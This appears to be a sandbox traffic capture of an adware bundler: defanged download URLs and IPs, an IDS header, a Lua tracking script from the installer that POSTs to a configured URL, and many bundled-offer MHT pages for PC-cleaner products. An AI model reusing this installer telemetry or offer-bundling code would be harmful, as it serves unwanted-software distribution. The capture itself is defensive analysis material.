hxxp://mirror.downloadmanager145.com/binstallers/BM2/api/do_tracking_hit.lua | 213.133.184.113 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/arcadetwist_playthru_pcprocleaner_updateadmin_628.mht | 213.133.184.112 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /binstallers/BM2/api/do_tracking_hit.lua HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadmanager145.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "9cc9c7aa05eddd412b09d5b37d446f81:1404848561"
Last-Modified: Tue, 08 Jul 2014 19:42:41 GMT
Accept-Ranges: bytes
Content-Length: 913
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
--[[
-- Lua Script to perform tracking hits IT can be run at start offer or finish and has aacces tot he variables
--]]

local http=require("wininet.http");
local json=require("json");

local main=function()
 -- Need GuiInit
 local guiinit=require("GuiInit");
 local _Downloads=require("Downloads");
 local target=current.file._a_.Options -- Get the options blob
 -- No Target is specified then do nothing
 if target == "" or not target then
 return; -- Blank so do nothing
 end
 target=current.expand_path(target);
 -- Get the command line and look for an option
 --[[local cli=current.expand_path("$CMDLINE");
 local opts=string.match(cli or "","--custom.p.tid=([^ ] )");
 ]]
 -- Make a reques to the target Url
 local r,c,h = http.request{
 method="POST",
 url=target ,
 proxy=_Downloads.proxyForUrl(target)
 }

end

return main();
<<< skipped >>>
GET /skins/da/11122015/megazord_darkskin_nondlm_cancel.zip HTTP/1.1
Accept-Encoding: identify, enc(RC4/sha1:dc724af1), enc(RC4/sha1:eb7eb628), enc(RC4/sha1:66ed45ce), enc(RC4/sha1:39443636)
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "398d4b8eeb1f419a51f5c199a58139a2:1447358884"
Last-Modified: Thu, 12 Nov 2015 20:08:04 GMT
Accept-Ranges: bytes
Content-Length: 73310
Content-Type: application/zip
Date: Tue, 15 Dec 2015 00:33:05 GMT
Connection: keep-alive
PK........,nkG].\.............options.json].... .D.~......... .e..-4........t.o.&...=b.r.%s..Z..F0.....Qi.....t..Q...";..i..)..l{.E...v....O.F..s gsHK..P...of.v........}$G......:.;G.....PK.........`.Dj..m............assets/.DS_Store..1..0......M\:2v....!x./....{t%..i..j....oB..P..x..@..................f.t|?MD...>....k<...]...V.y......f...m^.Z........e...".............0..u.....'<.[7n......p..-le.W.."...PK........8d.D3.......%.......assets/accept.png.VwXSg......2d.....$.D.BB$@...A!$7.F.$.$ .Ph..V....`.2.Z.2..(.....".Td....._....?........9.y...7....[.4. ....5.^.g.^..r2i`..H...Z...@.P.....6..@.....=.dK......<..."ta..X.?.......@V...8.....P/.$.G......r.d.3..f.P.o.u..p.9....e..0s3...$3....P...O@..a..%.. .(..O../..WP...P....x.....`.........8...`Qh.C@`p$<..5.~j0.7>.C...>....0o.0..B.D".....O.0D"q.....i ....)F............. ..2gz.AB2..z......a..S.d)C...(.....G.j............e... >Kv......w...,..!>Wv)L?*....xB:.... .\6...YQ... .........[P.8#*.K....Wm...J..).cc.....X..X.pT,.m.AcM.F..X:O d.X.*...,._.$..`.A.#...V.aoP.....(.......c."....|...s..6...C../............@.2^97.K36..hh......a....'g(Y0..)..%Y...?..l..<.O.....Q#......t....{.........u....rHE.Q...J.l.w[$.X5N...3...G3>...)N.w7h.^...I.>.../Us2.}.l..........>R...B..fA|8.!^I....J....k.....oo.....1!M9.}.._|.,k.bj.&B.g...D.......g_....T.S3 .G.7.5...v..5...........n.&hy.u=1..h..K1...D...}.|.../.x....R.}..r..W..u53...x...(A.hy.s^..S..f....l.P...."......k.v............R^V....9...=..&../...o.w.p....t'=]96.G.!W...........;~.<@..". .-......*.6l
<<< skipped >>>
GET /binstallers/BM2/adknowledge/ipage/adknowledge_3.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "963e0ef21e87f2dd88b475f85634a747:1434231096"
Last-Modified: Sat, 13 Jun 2015 21:31:36 GMT
Accept-Ranges: bytes
Content-Length: 61500
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Product Name..Date: Mon, 20 Oct 2014 17:40:00 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEC8C.DF382910"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEC8C.DF382910..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\vitallia_primary_4.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" =.."hXXp://VVV.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">..<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" =.."hXXp://VVV.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><HTML><HEAD>..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>.. =20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. =20..<SCRIPT src=3D"file:///C:/offerscreen/OfferScreenParameters.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE =..data-bind=3D"text:$root.customParameters()['ProductName']">Product=20..Name</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=...container{width:628px; height:282px; padding:16px 0 0 0;}=0A=..h1 {color: #000000;font-family: "Helvetica =..Neue","Helvetica","Arial",sans-s
<<< skipped >>>
GET /products/BM2/combos/arcadetwist_playthru_onesystemcare_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "668c51a87c703a436c83895218d6e534:1439558955"
Last-Modified: Fri, 14 Aug 2015 13:29:15 GMT
Accept-Ranges: bytes
Content-Length: 75945
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/arcadetwist_playthru_pcacceleratepro_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "e9325ef10ed838c35b5af7775c9eae91:1444312504"
Last-Modified: Thu, 08 Oct 2015 13:55:04 GMT
Accept-Ranges: bytes
Content-Length: 76083
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/arcadetwist_playthru_pcprocleaner_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "671db8939d3b2ae3d8a7433381dcd081:1438700315"
Last-Modified: Tue, 04 Aug 2015 14:58:35 GMT
Accept-Ranges: bytes
Content-Length: 76006
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/arcadetwist_knctr_playthru_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "2b71e9df8a1242ac5e8565c59fec2e5c:1438700315"
Last-Modified: Tue, 04 Aug 2015 14:58:35 GMT
Accept-Ranges: bytes
Content-Length: 76002
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/knctr_playthru_onesystemcare_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "0b20a9fd75b7da657a56c678953dfa53:1439558956"
Last-Modified: Fri, 14 Aug 2015 13:29:16 GMT
Accept-Ranges: bytes
Content-Length: 75945
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/knctr_playthru_tidy_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "e987399a16f3a98f5ba2a3b883279a21:1438700316"
Last-Modified: Tue, 04 Aug 2015 14:58:36 GMT
Accept-Ranges: bytes
Content-Length: 76105
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/knctr_playthru_tidy_triple_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "1ee70d370acae337db961198ce34abcf:1438700316"
Last-Modified: Tue, 04 Aug 2015 14:58:36 GMT
Accept-Ranges: bytes
Content-Length: 75801
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Mon, 7 Apr 2014 14:26:55 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0007_01CF526D.6D799070"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0007_01CF526D.6D799070..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\highlightly_stormalerts_optimizerpro_triple_628.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COL
<<< skipped >>>
GET /products/BM2/combos/tidynetwork_playthru_propccleaner_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "eaccef0167555b64ef5b014b80cd94f8:1438700316"
Last-Modified: Tue, 04 Aug 2015 14:58:36 GMT
Accept-Ranges: bytes
Content-Length: 75987
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/tidy_playthru_onesystemcare_triple_628_3.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "8a06da99b2dd4eae35a2d18f3903bdf1:1439558956"
Last-Modified: Fri, 14 Aug 2015 13:29:16 GMT
Accept-Ranges: bytes
Content-Length: 75952
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Thu, 11 Sep 2014 14:28:18 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0007_01CFCDCC.A1C309D0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0007_01CFCDCC.A1C309D0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\tidy_rapidwatch_optimizerpro_triple_628_3.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<TITLE>Search.com 628 by 282</TITLE>..<META content=3DIE=3D5.0000 http-equiv=3DX-UA-Compatible>..<SCRIPT type=3Dtext/javascript=20..src=3D"file:///C:/offerscreen/knockout-2.0.js"></SCRIPT>..<SCRIPT type=3Dtext/javascript=20..src=3D"file:///C:/offerscreen/AutoFeatureModel.js"></SCRIPT>..<META content=3D"text/html; charset=3Dutf-8" http-equiv=3DContent-Type>..<STYLE>BODY {...HEIGHT: 282px; FONT-FAMILY: arial, verdana, sans serif; WIDTH: 628px; =..POSITION: relative; COLOR: #222; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; =..PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: =..#e3e3e3..}..TABLE {...BACKGROUND-REPEAT: no-repeat..}..H1 {...MARGIN-BOTTOM: 4px; FONT-SIZE: 18px; FONT-WEIGHT: bold; MARGIN-TOP: 0px..}..P {...FO
<<< skipped >>>
GET /products/BM2/combos/onesystemcare_tidy_double628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "b2b2ba26d95808459c2f3b647fbec299:1439558956"
Last-Modified: Fri, 14 Aug 2015 13:29:16 GMT
Accept-Ranges: bytes
Content-Length: 72381
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Windows Internet Explorer 9"..Subject: 628 by 282 Icy Offer..Date: Mon, 7 Jan 2013 11:23:06 -0500..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0010_01CDECC9.5D450B40"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0010_01CDECC9.5D450B40..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\strongvault_tidy_double628.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" =.."hXXp://VVV.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" =.."http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD>..<SCRIPT type=3D"text/javascript" =..src=3D"file:///C:/offerscreen/knockout-2.0.js"></SCRIPT>..<SCRIPT type=3D"text/javascript" =..src=3D"file:///C:/offerscreen/AutoFeatureModel.js"></SCRIPT>..<TITLE>628 by 282 Icy Offer</TITLE>..<META content=3D"text/html; charset=3DUTF-8" =..http-equiv=3D"Content-Type"><!--=20..Edited by: Insert Initials & Date..Template Name: 628_Icy_2col_toolbar_EULA.php..-->..<STYLE>=0A=../* Overall page settings... */=0A=..=0A=..body {background-color:#fff;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#707271;}=0A=..#content {width:628px;height:282px; overflow:hidden; =..backgro
<<< skipped >>>
GET /products/BM2/combos/playthru_tidy_double_628_3.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "8a3a08bba5a986be972f7f21967d2a1d:1438700316"
Last-Modified: Tue, 04 Aug 2015 14:58:36 GMT
Accept-Ranges: bytes
Content-Length: 68655
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
